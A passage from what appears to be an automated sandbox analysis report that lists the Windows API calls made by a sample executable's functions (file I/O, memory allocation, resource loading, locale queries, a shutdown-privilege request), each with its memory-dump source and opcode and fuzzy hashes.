                                                            • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                            • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                            • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                            • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                            • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                            APIs
                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite
                                                            • String ID:
                                                            • API String ID: 442123175-0
                                                            • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                            • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                            • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                            • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                            APIs
                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FormatMessage
                                                            • String ID:
                                                            • API String ID: 1306739567-0
                                                            • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                            • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                            • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                            • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                            APIs
                                                            • SetEndOfFile.KERNEL32(?,020C4000,0040A08C,00000000), ref: 004076B3
                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast
                                                            • String ID:
                                                            • API String ID: 734332943-0
                                                            • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                            • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                            • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                            • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                            APIs
                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                            • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                            • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                            • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                            APIs
                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                            • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                            • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                            • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                            APIs
                                                            • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CharPrev
                                                            • String ID:
                                                            • API String ID: 122130370-0
                                                            • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                            • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                            • Instruction Fuzzy Hash:
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                            • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                            • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                            • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                            APIs
                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                            • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                            • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                            • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                            APIs
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                            • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                            • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                            • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 107509674-3733053543
                                                            • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                            • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                            • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                            • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                            APIs
                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                            • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                            • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                            • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                            • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                            • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                            • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                            APIs
                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: SystemTime
                                                            • String ID:
                                                            • API String ID: 2656138-0
                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                            APIs
                                                            • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                            • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                            • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                            • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                            • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                            • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                            • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressCloseHandleModuleProc
                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                            • API String ID: 4190037839-2401316094
                                                            • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                            • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                            • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                            • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                            • String ID:
                                                            • API String ID: 1694776339-0
                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                            APIs
                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                              • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                              • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
